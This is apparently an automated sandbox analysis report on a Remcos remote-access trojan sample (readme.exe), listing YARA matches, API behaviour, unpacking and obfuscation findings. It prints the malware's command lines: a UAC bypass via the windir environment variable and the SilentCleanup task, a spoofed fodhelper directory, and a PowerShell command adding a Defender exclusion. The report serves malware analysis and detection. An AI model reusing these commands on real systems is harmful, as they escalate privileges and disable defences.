Source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@58/25@7/2
Contains functionality for error loggingShow sources
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_00422410 GetLastError,FormatMessageA,21_2_00422410
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_0040EB33
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_1054037B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_1054037B
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_00409242 GetDiskFreeSpaceA,29_2_00409242
Contains functionality to enum processes or threadsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00409AA0 GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_00409AA0
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED3B30 CoCreateInstance,GetProcessHeap,HeapAlloc,EnterCriticalSection,CoAddRefServerProcess,LeaveCriticalSection,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,CoTaskMemFree,GetProcessHeap,HeapFree,10_2_00007FF6CFED3B30
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\readme.exeCode function: 0_2_00414CEC FindResourceA,0_2_00414CEC
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_004111A9
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\readme.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W2BICE6W\1cz9sVIo7vuQlevGvVvv2eYYPIQVPcEnI[1].htmJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\Nerdpol-NUCW3I
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4076:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yop40vn5.eib.ps1Jump to behavior
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\Public\x.vbs
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\Desktop\readme.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\readme.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\readme.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
Reads ini filesShow sources
Source: C:\Users\user\Desktop\readme.exeFile read: C:\Windows\win.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\readme.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\readme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\readme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\readme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\readme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\readme.exeFile read: C:\Users\user\Desktop\readme.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\readme.exe 'C:\Users\user\Desktop\readme.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Runex.bat' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows \System32\fodhelper.exe C:\Windows \System32\fodhelper.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\Public\x.vbs
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\x.vbs'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\cde.bat' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Htdr
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Local\Htdr\Htdr.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe 'C:\Users\user\AppData\Local\Htdr\Htdrset.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Local\Htdr\Htdr.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknownProcess created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe 'C:\Users\user\AppData\Local\Htdr\Htdrset.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Users\user\Desktop\readme.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' 'Jump to behavior
Source: C:\Users\user\Desktop\readme.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Runex.bat' 'Jump to behavior
Source: C:\Users\user\Desktop\readme.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\fodhelper.exe C:\Windows \System32\fodhelper.exeJump to behavior
Source: C:\Windows \System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\x.batJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\Public\x.vbsJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\x.vbs' Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\cde.bat' 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Htdr Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe 'C:\Users\user\AppData\Local\Htdr\Htdrset.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM '
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe 'C:\Users\user\AppData\Local\Htdr\Htdrset.exe'
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\readme.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
Uses Rich Edit ControlsShow sources
Source: C:\Users\user\Desktop\readme.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLLJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: FodHelper.pdb source: Htdrset.exe, fodhelper.exe.8.dr
Source: Binary string: FodHelper.pdbGCTL source: readme.exe, 00000000.00000002.675597032.00000000048E0000.00000004.00000001.sdmp, fodhelper.exe, 0000000A.00000002.629081945.00007FF6CFEDA000.00000002.00020000.sdmp, Htdrset.exe, 00000015.00000002.720540392.0000000002C30000.00000004.00000001.sdmp, Htdrset.exe, 0000001D.00000002.723220487.0000000002820000.00000004.00000001.sdmp, fodhelper.exe.8.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\Desktop\readme.exeUnpacked PE file: 0.2.readme.exe.10530000.7.unpack
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeUnpacked PE file: 21.2.Htdrset.exe.10530000.7.unpack
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeUnpacked PE file: 29.2.Htdrset.exe.10530000.7.unpack
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0xB1EB5A0E [Sun Aug 3 12:14:06 2064 UTC]
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\readme.exeCode function: 0_2_00476B04 VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,0_2_00476B04
PE file contains sections with non-standard namesShow sources
Source: fodhelper.exe.8.drStatic PE information: section name: .imrsiv
Source: propsys.dll.8.drStatic PE information: section name: .xdata
Source: propsys.dll.8.drStatic PE information: section name: /4
Source: propsys.dll.8.drStatic PE information: section name: /19
Source: propsys.dll.8.drStatic PE information: section name: /31
Source: propsys.dll.8.drStatic PE information: section name: /45
Source: propsys.dll.8.drStatic PE information: section name: /57
Source: propsys.dll.8.drStatic PE information: section name: /70
Source: propsys.dll.8.drStatic PE information: section name: /81
Source: propsys.dll.8.drStatic PE information: section name: /92
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\readme.exeCode function: 0_2_004930AC push 00493125h; ret 0_2_0049311D
Source: C:\Users\user\Desktop\readme.exeCode function: 0_2_004935D0 push 0049365Dh; ret 0_2_00493655
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_69C90DFE push rsp; iretd 10_2_69C90DFF
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_69C8F018 pushfq ; iretd 10_2_69C8F02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_004139B0 push eax; ret 20_2_004139DE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_105451F8 push eax; ret 20_2_10545226
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_1054D3A2 push dword ptr [ebp+753F20E5h]; retf 20_2_1054D3BD
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004930AC push 00493125h; ret 21_2_0049311D
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004935D0 push 0049365Dh; ret 21_2_00493655
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_00432008 push 0043204Bh; ret 21_2_00432043
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_00492030 push 00492056h; ret 21_2_0049204E
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004640DC push 00464136h; ret 21_2_0046412E
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_00416174 push ecx; mov dword ptr [esp], edx21_2_00416175
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004141D4 push ecx; mov dword ptr [esp], edx21_2_004141D9
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004561E8 push 00456214h; ret 21_2_0045620C
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004142F4 push ecx; mov dword ptr [esp], edx21_2_004142F9
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_00414338 push ecx; mov dword ptr [esp], edx21_2_0041433D
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_00428394 push 00428464h; ret 21_2_0042845C
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_0043445C push 00434488h; ret 21_2_00434480
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_00412424 push 00412471h; ret 21_2_00412469
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_0041E528 push 0041E554h; ret 21_2_0041E54C
Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_054EF86E push esi; retf 26_2_054EF88D
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004930AC push 00493125h; ret 29_2_0049311D
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004935D0 push 0049365Dh; ret 29_2_00493655
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_00432008 push 0043204Bh; ret 29_2_00432043
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_00492030 push 00492056h; ret 29_2_0049204E
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004640DC push 00464136h; ret 29_2_0046412E
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_00416174 push ecx; mov dword ptr [esp], edx29_2_00416175
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004141D4 push ecx; mov dword ptr [esp], edx29_2_004141D9
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004561E8 push 00456214h; ret 29_2_0045620C
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004142F4 push ecx; mov dword ptr [esp], edx29_2_004142F9

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows \System32\fodhelper.exeExecutable created and started: C:\Windows \System32\fodhelper.exeJump to behavior
Uses cmd line tools excessively to alter registry or file dataShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Contains functionality to download and launch executablesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040D427 